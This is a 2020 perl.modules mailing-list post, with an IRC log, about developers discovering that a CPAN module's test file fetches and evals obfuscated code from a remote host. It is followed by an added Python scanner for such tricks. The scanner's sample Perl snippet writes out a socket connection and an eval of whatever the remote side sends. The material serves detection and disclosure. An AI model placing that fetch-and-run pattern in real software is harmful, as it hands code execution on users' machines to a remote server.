perl.modules | Postings from July 2020

Malicious module on CPAN

From: Ryan Voots
Date: July 28, 2020 02:07
Subject: Malicious module on CPAN
Message ID: CA+sVJXmWtWz-qHwbw=8iBExrHcKqyVqQW3jg7CBynwuoxtXmzg@mail.gmail.com
Not found by me but I'm not sure if anyone else has reported this yet.  It
was discussed in magnet#toolchain earlier today and brought forth by mst on
who to contact about it.

It looks like Module::AutoLoad is running malicious code fetched from
http://r.cx/, it might have originally been non-malicious but it appears to
either be some kind of rootkit or iPhone jailbreak or something currently.

The trigger itself seems to be this test running:
https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t

This appears to have been known about for a few years by some people but
it's the first I'm seeing about it:
https://stackoverflow.com/questions/35212843/perl-understanding-botstrap

Below is the entire conversation from IRC about the discovery.


18:17:47 < haarg> regarding potentially malicious code on cpan
18:17:49 < haarg>
https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t
18:18:40 < Grinnz> oh god
18:19:02 < haarg> let me know if you figure out what it does
18:19:17 < Grinnz> i've figured out enough to wonder what the fuck this is
doing here
18:19:32 < ether> what it *wants* to do is take the location of the current
.t file, go up one dir and find contrib/RCX.pl and then run that script
18:19:32 < haarg> it's like 5 steps of insanity, most of which involve
evaling code read straight off a random internet server
18:19:45 < haarg> yeah, now look at that script
18:19:47 < Grinnz> ether: yeah that script is where the scary part starts
18:20:26  * ether ಠ_ಠ
18:20:27 < Grinnz> also: 82.46.99.88.":1"
18:20:43 < Grinnz> ... this is concatenating a vstring with a string
18:20:48 < Grinnz> how would that ever work
18:21:14 < ether> I wonder what used to be at 82.46.99.88
18:22:09 < haarg> https://perlbot.pl/p/1133d2
18:22:29 < ether> he's up front about it being black magic in the docs
18:22:35 < ether> but this shit should have never been put on cpan
18:22:55 < Grinnz> "botstrap" is also cute
18:23:03 < haarg> it's not just "black magic" it's "active remote exploit"
18:23:52 < Grinnz> mst / klapperl ^
18:24:06 < haarg> this is the eval: https://perlbot.pl/p/ui358q
18:24:12 < veesh> wow, that is not acceptable
18:24:17 < haarg> the unpack i mean
18:25:24 < haarg> next step: https://perlbot.pl/p/o1lk67
18:26:15 < haarg> next step: https://perlbot.pl/p/gkoxmt
18:26:52 < Grinnz> fyi that has been there since the first release of that
dist in 2011
18:27:10 < Grinnz> though with different ips
18:30:03 < ether> 82.46.99.88.":1" = R.cX:1
18:30:11 < Grinnz> oh dear god
18:30:22 < Grinnz> so it's a vstring and not an ip at all
18:30:23 < ether> what does IO::Socket::INET do with that? is :1 a port
number?
18:30:26 < Grinnz> yes
18:30:49 < ether> I missed haarg's first paste, https://perlbot.pl/p/1133d2
- that makes it more clear :)
18:30:56 < ether> jfc
18:31:08 < ether> burn it with fire
18:31:29 < haarg> i haven't traced the next step because it's pain to
decode without running the whole thing
18:33:07 < veesh>
https://stackoverflow.com/questions/35212843/perl-understanding-botstrap
18:35:21 < ether> I wonder if those guys ever did report this to
modules@perl.org
18:35:25 < ether> narrator: they did not.
18:36:12 < ether> I don't see how r.cx could have been hacked and these
eval chains still work
18:36:17 < ether> therefore, this was all intentional
18:36:29 < ether> burn it all down and bury this guy at sea
18:36:42 < ether> mst: would you agree?
18:38:44 < veesh> i just noticed now that the OP on the SO question was
asking how to port the code to python
18:39:00 < veesh> i'm glad that all those people left perl 20 years ago
18:43:10  * Grinnz commented on the SO answer with some non-malicious
solutions to this problem
18:44:59  * ether flagged for moderator attention to get it taken down
18:45:56 < haarg> i'm not having any luck tracing what the code does
further than what i posted so far
18:46:07 < haarg> i need a VM or something
18:47:11 < veesh> docker sounds like a good choice?
18:47:20 < Grinnz> sounds like a job for simcop2387
18:57:15 < ether> I tried searching for those tags - SHAtter GreenPois0n
@GeoHot - but got lost in a spiral of l33tsp33k and had to lie down
19:35:45 < Grinnz> http://neilb.org/2020/07/24/inconsistent-permissions.html
- looks like the usual use of AUTHORITY is done by default now, neat
19:35:46 < dipsy> [ Inconsistent permissions on CPAN modules ]
19:35:49 < simcop2387> Grinnz: haarg: hrm?
19:36:20 < Grinnz> simcop2387: attempting to figure out what some malicious
code does
19:36:58 < simcop2387> oh fun, yea the pastebin is hopefully nice for that,
but it's one reason why i refuse to do a full cpan test run until i get a
proper sandbox for it setup
19:38:30 < simcop2387> it looks almost like the EFI stuff in modern UEFI
systems? like it's trying to load something into the vars there?
19:38:48 < simcop2387> or maybe it's just pretending to do so
19:39:34 < stigo> seems like a distraction to me, GreenPois0n pops up an
old ios jailbrak for instance.
19:40:16 < simcop2387> yea after reading the rest of the links it looks
like it's loading an iphone jail break of some kind.  possibly to infect
any attached devices
19:40:32 < Grinnz> it seems to me like the guy typed in "how to rootkit for
noobs" in google and attached his code to that
19:40:47 < simcop2387> maybe
19:43:29 < stigo> almost like a ctf, interesting that r.cx:1 doesn't close
the socket after delivering the first code part.
19:52:57 < stigo> some of r.cx's zone file: https://tpaste.us/ql09
20:17:25 < stigo> aha, this seems to be the tool used:
http://www.perlobfuscator.com
20:17:26 < dipsy> [ Free Perl Obfuscator ]
20:23:20 < Grinnz> oh god
20:27:21 < mohawk> at the bottom it offers a de-obfuscator
20:43:55 < simcop2387> stigo++
21:40:17 < mst> yeah, somebody email module@perl.org, klapperl@cpan.org
please
21:41:13 < simcop2387> if no one has done it yet, i'll do it shortly.
21:41:20 < mst> cheers
21:41:31 < simcop2387> i need to do some dishes and hand feed the cat first
though
21:41:34 < mst> up to eyeballs in something else, would prefer somebody who
was paying attention to do so
21:41:40 < mst> aye, fair
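As a defender-side illustration of the v-string trick that ether and Grinnz work out in the log above (the literal `82.46.99.88.":1"` spelling `R.cX:1`), here is an added example that is not code from this post, from Module::AutoLoad, or from any of the people quoted: a small Python scanner that finds bare v-string literals in Perl source, decodes them the way perl does (one `chr()` per dot-separated field), reports the ones that decode to printable text, and separately flags an `eval` fed directly from a filehandle on the same line. The Perl snippet it scans (`SAMPLE_PERL`) is constructed for the example and only mimics the shape described on the list; the function names and regexes are this example's own, and the regexes are crude heuristics (comment stripping ignores `#` inside strings, and the eval pattern catches only the one-line form), not a Perl parser.

```python
import re
from typing import Dict, List

# Constructed sample for this example; it is NOT the real Module::AutoLoad
# source. It mimics the shape discussed on the list: a v-string that spells
# a hostname, a socket to it, and an eval of whatever comes back.
SAMPLE_PERL = r'''
use IO::Socket::INET;
my $host = 82.46.99.88.":1";      # v-string: chr(82).chr(46).chr(99).chr(88) eq "R.cX"
my $version = 1.2.3;              # v-string too, but control characters only
my $pi = 3.14;                    # ordinary float: a single dot is a number
my $sock = IO::Socket::INET->new(PeerAddr => $host) or die "connect: $!";
eval join "", <$sock>;            # runs whatever the remote side sent
'''.lstrip("\n")

# A bare literal with two or more dots is a v-string in Perl. The lookarounds
# keep the match off identifiers (foo1.2.3) and off the leading-"v" form
# (v5.10.1), which is the legitimate version-requirement syntax.
VSTRING_RE = re.compile(r"(?<!\w)(\d+(?:\.\d+){2,})(?!\w)")

# eval on data read straight from a filehandle on the same line. Crude
# heuristic (assumption of this example): the real code spread the same
# idea across several unpack/eval steps that this pattern would not catch.
EVAL_OF_HANDLE_RE = re.compile(r"\beval\b.*<\$?\w+>")


def decode_vstring(literal: str) -> str:
    """Decode a v-string literal the way perl does: one chr() per dot-separated field."""
    return "".join(chr(int(field)) for field in literal.split("."))


def scan_perl_source(src: str) -> List[Dict[str, object]]:
    """Return findings: v-strings that decode to printable text, and eval-of-handle sinks."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        # Drop trailing comments (heuristic: ignores '#' inside string literals).
        code = line.split("#", 1)[0]
        for match in VSTRING_RE.finditer(code):
            decoded = decode_vstring(match.group(1))
            # Control-character v-strings such as 1.2.3 are ordinary version
            # literals; only printable decodings look like hidden text.
            if decoded.isprintable():
                findings.append({"line": lineno, "kind": "vstring_text",
                                 "literal": match.group(1), "decoded": decoded})
        if EVAL_OF_HANDLE_RE.search(code):
            findings.append({"line": lineno, "kind": "eval_of_handle",
                             "code": code.strip()})
    return findings


if __name__ == "__main__":
    for finding in scan_perl_source(SAMPLE_PERL):
        print(finding)
```

Run against the sample, the scanner reports the `82.46.99.88` literal on line 2 as decoding to `R.cX` and the `eval join "", <$sock>` line as an eval-of-handle sink, while `1.2.3` and `3.14` pass silently. The printable-text filter is what separates an obfuscated hostname from the version literals that legitimately appear in `use`/`require` lines; anything it flags in a test file still deserves a manual read, since the regex cannot tell a string concatenation from a numeric context.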
